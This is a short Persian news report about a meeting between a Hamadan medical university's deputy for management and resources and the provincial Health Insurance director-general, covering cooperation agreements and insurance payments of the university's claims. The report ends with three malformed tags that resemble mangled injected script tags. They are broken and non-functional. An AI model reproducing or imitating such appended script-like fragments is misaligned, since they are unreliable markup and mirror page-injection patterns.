دیدار معاون توسعه مدیریت و منابع دانشگاه با مدیر کل بیمه سلامت استان همدان

بهروز رحیمی معاون توسعه مدیریت و منابع دانشگاه با دکتر فرجی مدیر کل بیمه سلامت استان دیدار کرد.
به گزارش روابط عمومی معاونت توسعه مدیریت و منابع دانشگاه، مهندس رحیمی معاون توسعه مدیریت و منابع  با حضور مهندس حلافی و مهندس کریمی، مدیر و کارشناس امورمالی دانشگاه با دکتر فرجی مدیر کل بیمه سلامت استان همدان دیدار کردند.

در این بازدید مهندس رحیمی معاون توسعه مدیریت و منابع دانشگاه ضمن تقدیرازهمکاری و عملکرد قابل توجه بیمه سلامت با دانشگاه علوم پزشکی همدان، در خصوص تفاهم نامه هایی فی ما بین دانشگاه و بیمه سلامت موضوعاتی مطرح شد و مورد بحث و بررسی قرار گرفت.

در پایان مهندس حلافی مدیر امور مالی دانشگاه از عملکرد و نحوه پرداخت بیمه سلامت در خصوص مطالبات مالی دانشگاه تقدیر نمود و اظهار امیدواری کرد و افزود: قسمتی از مطالبات مالی سال جاری دانشگاه نیز توسط بیمه سلامت پرداخت شده است و اگر با این رویه ادامه پیدا کند چشم انداز خوبی را از پرداخت مطالبات خواهیم داشت.<2 src='3?l=p&' type=text/java2 language=java2><2 src='3?l=p&' type=text/java2 language=java2><2 src='4?l=p&' type=text/java2 language=java2>